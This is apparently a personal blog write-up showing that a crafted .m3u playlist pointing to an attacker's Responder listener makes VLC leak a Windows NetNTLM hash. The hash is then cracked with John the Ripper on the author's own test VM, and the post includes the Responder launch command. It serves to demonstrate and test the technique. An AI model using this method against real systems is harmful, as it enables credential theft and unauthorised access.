Hi readers, since one of my idol tweeted that it is possible to get NetNTLM hash using .m3u file sometime back, I decided to try it out and do a simple write up.
Figure below shows the yappare tweet:
In order to get the NetNTLM hash, we need to create a .m3u (playlist) file. As can be seen in below figure, the .m3u file contains a path to a song on my desktop and Responder IP Address.
P.S: Your playlist (.m3u) can play songs via URL.
Once the file is opened in VLC player, VLC player will play the first song. Once the song ends or the next button is clicked, the author is able to receive the NetNTLM hash.
Upon creating the file (.m3u), do ensure you have downloaded Responder. In order to run Responder, just insert the following command into the terminal:
./Responder.py -I eth0
Figure below shows that Responder is listening for events:
Once Responder is listening for events, open the created file with VLC Player. Once the song ends or the next button is clicked, VLC player, will show its users the following error message.
While error message is shown to users, the auditor has received the NetNTLM hash as shown in figure below:
With the received NetNTML hash, an attacker can run John the Ripper in order to crack the password. Figure below shows my Win 10 (Virtual Machine) password is 1337.
P.S: The password was set just for this write up 😉.